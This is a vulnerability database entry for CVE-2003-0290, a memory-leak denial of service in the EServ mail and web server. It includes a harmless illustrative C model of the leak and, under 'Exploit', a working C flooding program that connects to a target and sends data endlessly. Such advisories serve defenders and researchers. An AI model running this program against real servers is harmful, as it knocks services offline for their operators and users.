EType EServ Resource Exhaustion Remote Denial of Service Vulnerability

Vulnerability ID 1107316 Vulnerability Type Design Error
Published 2003-05-11 Updated 2005-10-20
CVE ID CVE-2003-0290
CNNVD-ID CNNVD-200306-090
Platform Windows CVSS Score 5.0
|Vulnerability Source
https://www.exploit-db.com/exploits/22586
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-090
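|Vulnerability Details
Eserv is a system that integrates Mail, News, Web, FTP and proxy servers. The Eserv service mishandles open connections, and a remote attacker can exploit this to cause a denial of service. The Eserv connection handler contains a memory leak: when a connection is accepted, the server allocates 8 to 32K bytes of memory on the heap, but once the connection no longer exists Eserv does not correctly free the memory that connection used. By making a very large number of successful connections, an attacker drives memory use so high that the system becomes unstable. For example, after about 1,000 connections, 78MB to 312MB of memory is typically leaked.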
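
The leak pattern described above, as an added example that is not EServ source code and not part of the original advisory: a simulated handler allocates 8K to 32K per connection, and a flawed teardown is compared with a corrected one. The names `conn_open`, `conn_close_leaky`, `conn_close_fixed` and `run_connections`, and the constructed size sequence, are assumptions made for illustration.

```c
/* Added example: simulated connection lifecycle, not EServ source code. */
#include <stdio.h>
#include <stdlib.h>

struct conn { char *buf; size_t len; };   /* hypothetical per-connection state */

static size_t live_bytes;                 /* heap bytes still allocated */

/* Accept path: 8K-32K of heap per connection, the range the advisory gives. */
static int conn_open(struct conn *c, unsigned seq)
{
    c->len = (8u + seq % 25u) * 1024u;    /* constructed sizes, 8K..32K */
    c->buf = malloc(c->len);
    if (c->buf == NULL) return -1;
    live_bytes += c->len;
    return 0;
}

/* Flawed teardown: the pointer is dropped, the allocation is never released. */
static void conn_close_leaky(struct conn *c)
{
    c->buf = NULL;
}

/* Corrected teardown: release the buffer and update the accounting. */
static void conn_close_fixed(struct conn *c)
{
    free(c->buf);
    live_bytes -= c->len;
    c->buf = NULL;
}

/* Open and close n connections one after another; return bytes left allocated. */
static size_t run_connections(unsigned n, void (*teardown)(struct conn *))
{
    struct conn c;
    live_bytes = 0;
    for (unsigned i = 0; i < n; i++) {
        if (conn_open(&c, i) != 0) break;
        teardown(&c);
    }
    return live_bytes;
}

int main(void)
{
    printf("leaky: %zu bytes\n", run_connections(1000, conn_close_leaky));
    printf("fixed: %zu bytes\n", run_connections(1000, conn_close_fixed));
    return 0;
}
```

Because the leak sits in teardown, connections made one after another accumulate it; in this model, limiting simultaneous connections alone would not stop the growth.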
|Exploit
source: http://www.securityfocus.com/bid/7552/info
 
A denial of service vulnerability has been reported for EServ. The vulnerability exists due to the way the server handles connections. Specifically, memory allocated for open connections is not properly freed when a connection no longer exists. This will result in a consumption of all available memory resources.
 
**It has been reported that EServ version 3.0, previously thought to be invulnerable to this issue, is affected by this vulnerability. This version was tested on Windows 2000.
 
This vulnerability affects EServ 2.92 to 3.0. 

/* m00-eServ-fun.c
 *
 *  EServ/2.95-3.00 remote memory-leak exploit
 *
 *  Result: exiting program and close all services
 *  if you seen message: Broken pipe
 *  then may going drink beer 8)
 *
 *  Eserv 3.0 only web(80) services susceptible on this DoS
 *
 *  rash / m00.void.ru
 */

#include <stdio.h>
#include <stdlib.h>      /* exit, atoi, rand */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr */

int main(int argc, char *argv[])
{  
  char buf[2000];
  int fd;
  struct sockaddr_in rsin;

  if (argc!=3) {
   printf("\n usage: %s <ip> <port>\n\n", argv[0]);
   exit(0);  
  }
  
  rsin.sin_family = AF_INET;
  rsin.sin_port   = htons(atoi(argv[2]));
  rsin.sin_addr.s_addr = inet_addr(argv[1]);
 
  for (fd=0;fd<2000;fd++)
    buf[fd]=(char)(rand()*10);
  
  fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);             
  if (connect(fd,(struct sockaddr *)&rsin,sizeof(struct sockaddr))) perror("[-] connect()"),exit(0);
  printf("[+] connected..\n"); 
  printf("[+] send data to host..\n"); 
  
  while (1) {
   if ((send(fd, buf, 2000, 0))<0)      
     break;  
  }   
}
|References

Source: BUGTRAQ
Name: 20030513eServMemoryLeakSolution
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105284631428187&w=2
Source: BUGTRAQ
Name: 20030511eServMemoryLeakEnablesDenialofServiceAttacks
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105284630228137&w=2
Source: XF
Name: eserv-multiple-connections-dos(11973)
Link: http://xforce.iss.net/xforce/xfdb/11973
Source: BID
Name: 7552
Link: http://www.securityfocus.com/bid/7552
Source: VULNWATCH
Name: 20030511eServMemoryLeakEnablesDenialofServiceAttacks
Link: http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0064.html
